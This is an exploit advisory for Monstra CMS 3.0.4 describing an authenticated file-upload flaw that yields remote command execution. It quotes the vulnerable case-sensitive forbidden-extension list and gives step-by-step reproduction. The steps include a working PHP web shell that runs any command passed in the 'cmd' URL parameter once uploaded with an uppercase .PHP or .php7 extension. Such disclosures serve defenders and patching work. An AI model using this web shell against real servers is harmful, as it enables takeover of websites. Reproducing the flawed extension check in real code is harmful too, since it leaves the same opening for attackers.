Exploit Title: Monstra CMS -3.0.4 RCE
Vendor Homepage: http://monstra.org/
Software Link:
https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip
Discovered by: Ishaq Mohammed
Contact: https://twitter.com/security_prince
Website: https://about.me/security-prince
Category: webapps
Platform: PHP
Advisory Link: https://blogs.securiteam.com/index.php/archives/3559
Description:
MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a
remote command execution on the remote server.
Vulnerable Code:
https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php
line 19:
public static function main(){// Array of forbidden types
$forbidden_types = array('html','htm','js','jsb','mhtml','mht','php','phtml','php3','php4','php5','phps','shtml','jhtml','pl','py','cgi','sh','ksh','bsh','c','htaccess','htpasswd','exe','scr','dll','msi','vbs','bat','com','pif','cmd','vxd','cpl','empty');
Proof of Concept
Steps to Reproduce:1. Login with a valid credentials of an Editor
2. Select Files option from the Drop-down menu of Content
3. Upload a filewith PHP (uppercase)extension containing the below code:(EDB Note: You can also use .php7)<?php
$cmd=$_GET['cmd'];
system($cmd);
?>4. Click on Upload
5. Once the fileis uploaded Click on the uploaded fileand add ?cmd= to
the URL followed by a system command such as whoami,time,date etc.
Recommended Patch:
We were not able to get the vendor to respond inany way, the software
appears to have been left abandoned without support – though this isnot an
official status on their site (last official patch was released on
2012-11-29), the GitHub appears a bit more active (last commit from2 years
ago).
The patch that addresses this bug is available here:
https://github.com/monstra-cms/monstra/issues/426
